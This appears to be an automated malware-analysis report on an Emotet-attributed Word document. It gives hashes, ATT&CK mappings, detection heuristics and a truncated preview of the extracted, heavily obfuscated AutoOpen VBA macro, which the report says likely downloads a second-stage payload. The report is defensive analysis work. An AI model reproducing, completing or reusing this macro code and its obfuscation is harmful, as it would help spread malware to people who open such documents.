Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 25d8545230ddfe45…

MALICIOUS

Office (OLE)

Size: 116.8 KB
Created: 2018-09-27 21:56:00
Authoring application: Microsoft Office Word
First seen: 2019-08-04
MD5: f7ee2734f9a40f9847424b1afd1bcac2
SHA-1: 6268a7792d61d934f8242c050417a5ace5967c4d
SHA-256: 25d8545230ddfe4589b7e5b9603570e6f100d490ee8f4f2d4ffdf5917c3f4514
Risk score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1203 Exploitation for Client Execution

The sample contains critical heuristics indicating the presence of VBA macros and a Shell() call, strongly suggesting malicious intent. ClamAV detection confirms this, identifying it as Doc.Downloader.Emotet-6884000-0. The AutoOpen macro is designed to execute automatically, likely downloading and executing a second-stage payload. The presence of the 'macros.bas' file and the Emotet family attribution further support this assessment.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6884000-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6884000-0
  • VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename:  macros.bas
Kind:      vba-macro
Source:    oletools.olevba.extract_macros (decoded VBA source)
Size:      17821 bytes
SHA-256:   fc497c24ecd12d29cd7918b42f041225b6349766121d4111f0ffb877e3c118cd

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "qjCmQBTjrof"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim ILXLC(2)
ILXLC(0) = Left(QojmHSl + SKtfPoTHrzdrjQhd + KLGqUlt, 942) + InStrRev(Ctmjsji + HDEKuJjoGqkHHzmovDK + LwjJVw, hKiiGAM + BFqzvvtEtupFQzjzZKNpGDD + zAzaHv) + Left(fVQBq + FFzbthBVOIooPrwXFcuTi + sBQivj, 116) + Left(AGbDowf + wGNpvYDSzQLlioAFSS + TijnPuj, 145)
ILXLC(1) = InStr(IjCBCFoJ + GDZPqJzzZfsaKLnJJjrT + jPcluQJ, bQFUw + kJXRQJIstAAjhKlKuwND + RRwdFr) + InStrRev(nzhwz + kUtBPIbMjvilLYNvwri + BJzvihm, nKcTBt + qjwJJFrcbjCOfGzFLvsft + wBwCE) + InStrRev(XAzidsE + FFDJKHIMCnBfzDDGqSZWPVr + FdGBF, ZpZwqsIq + frDvfCtPOfjooScivmwRKi + AQzJj) + InStrRev(pAcGabN + AHqAlfNmHGtjasRsiREw + zSAzH, jFQCnNQ + LicNpajpJaZwLaul + nTzXJd)
   Dim dDlXjF(2)
dDlXjF(0) = InStrRev(BQtsRJ + NOjUqMSHoYOcpfsMFpwo + rZdsVvd, KuzpzQ + PrjGrlRbYzOZMtznol + vsKikibt) + Left(iiznTA + btWfdawVvAczVdwhhAnzf + JfcYaw, 513) + Right(sVPOj + sfsSXNzBFTftrdFRQtM + BBKkc, 411) + InStrRev(wkuUmjBw + XUfuDWwmIRRWjKVCVWjG + HtZEuEV, pAVGwo + iqjjONJvftEGqOvcYasE + GrJWJXO)
dDlXjF(1) = Left(zPpztj + bZbmJmKsCLMXqFHWAZII + itwVOC, 934) + InStr(QiVozs + RUDWAdFulJTRwRbFn + AODGZHO, dcOrn + hlUPTQmtwNYXVmjToSthVr + jmVcdUT) + InStrRev(SZKkbK + uptpqtsUminEqpGGLU + DbTQv, NIUEbBj + tcXJhoGPBUuVENlqNXc + lZWTAXW) + InStr(RMiwa + VDwtHoDGvQQtYRuYHRmPw + rDsfLk, rUjDWwi + EGGNfzCCCOwioAznLajjAR + kcXbZwZL)
   Dim zMEwc(2)
zMEwc(0) = InStrRev(BiIjfpc + HmUaFvwCaibowKouljPw + znYREmvb, nqPUDOBk + GMjzDVBOKsntbFlGnjzJH + uUqXhiw) + InStrRev(nGYOjlNN + zzoOuoQdvGCZiRrrdNrzi + BWXBV, IWoGGvjQ + AlkhuzIWWrlHvsmuF + UNQHcU)
zMEwc(1) = InStrRev(IMMKwwiU + PwzPzXozKCwWbRWQmU + aOiYwDK, iUqRaE + tnUQsLqRViLEVEbSTzRlp + SBFCAMG) + InStr(hSOiDoHF + BTJPOzBzubBfsoMpUR + bXJDqwi, EKvKI + DzKJdRjnUKAvQNNwsFvLESC + UWDkCVlV)
   Dim lQopB(1)
lQopB(0) = InStrRev(zFPth + AHjCHjaFSiIlKBJHiSwsjP + AkozUSM, lfUPavKV + YtvwpMaUCOCnRtRUOpY + XuLrI) + Right(XZWRtEow + wtnhisDVpsBtDqYvBiL + rcQzAV, 341)
   Dim UrfjYo(2)
UrfjYo(0) = InStrRev(WIhvW + STOPDjmwZpGViYaR + UsRjs, DOSVw + jHBOzJEHjiaCBdEHHwbz + qzjkH) + InStrRev(iYoXW + PHnliAqKaFzRiEJVDIKV + OYwiMFmJ, zLqPftzo + JCVoqkNHJFmqbVLwUS + wqWOupK)
UrfjYo(1) = Right(MSqLDI + rlBbnNVwEXnpVXYzT + MzAjZY, 900) + InStrRev(NXWdhm + dBJwlVjYGVofGYZEbD + KojKQTKd, PURMUb + DARZStCQFIhcEwJFcEMO + UPpDtDw) + InStrRev(AnikWmHO + VCrKjOLVhapnzdNwX + mjEAa, SVqKIHjd + qfscNJBpwYJfDKPLF + zXDLkjd) + InStr(UZDIs + YLuwkRObaiEzwiDfUY + dYHsEjq, ubqALjC + ukJBYkCaZENoaRacZK + TrJVdSn)
   Dim zMdRa(2)
zMdRa(0) = InStr(WHBJQCZG + ZuFZHzwqJOOHbCPcjGzo + RIPUQ, EJsts + OISkSkIAWpAKdkFiTqoF + rLKzru) + InStrRev(ZOYoOWq + rtfQHZwSnNJzoKbZz + cFZkPMY, oVZzMwJ + qAZGVRZWADuRANRqWKHYHE + abqqBroH)
zMdRa(1) = InStrRev(VkIKb + HoXVLjXSNbicRCzMjKCCc + QvpiL, zAPCSP + SjiNYajTiLOJOEluQzijB + cRmtKk) + Right(rSYPVjj + DAVHkdIrOfvkzGzSjuU + YWlNiGRj, 450) + Left(BWJrVIl + mpHTuulOvGjYOJQdkww + TcwzG, 934) + InStrRev(AFKjO + ksfUcZcwadLsHjREzSvQfS + iTOzzqzs, bvdWzA + kfBRjUSSzpbzcOJka + uOrHOV)
   Dim SvsDhr(2)
SvsDhr(0) = InStrRev(mthoYw + RZqBHqzwPknawkpjt + UNhwWqsq, KapoiZWc + FRGIpOnljRJhVTIUaFHT + AiRRLSE) + InStrRev(qDHZJHCH + iAtTkCNHEqzjpfWTs + utiBVu, XzVFJ + OhPFEKztEpsTctzRGzojj + vjsbtI) + Left(QpDnLQj + wjBfkrJIrUGawiBdERLjnk + kFlBWDDm, 12) + Left(KpjwkQk + rUtVPGrTzNvYAYWwDWLikHq + SaQDIV, 998)
SvsDhr(1) = InStr(PmQLj + vnmoKNalZTfmYRWAJj + DAIJHEir, hpUDz + NqRiBUiENwoirAjoCSGV + jVEStUR) + InStrRev(wtsEB + FFqjCESETULIYNBUzZl + hdYuXswh, MAiUic + OZAGDlpZChjETwwfXsLXn + LGpsWrw) + InStrRev(jsaanF + tAbUtDSFzfwCBTajjm + kUvNFbzs, winbPRCJ + uQnUhfGMWPaMzzqbrGFN + XZbEI) + InStr(LPvUhaj + sfviXclPTMhpCkQJ + BEpoOzPW, JBoNZS + FzpooUsEFRzJXTaFpIUMOw + juzPk)
fANEWSKqkBbZdU (KeyString(KrVIV + wvqzwXa + 15 + 4 + 48 + InGraCi + RZzZir) + iXBjm + oFTGXX + KeyString(JjdiB + IICjEOj + 17 + 5 + 55 + zrzpDr + zqCUic) + AlVZTL + aZXk
... (truncated)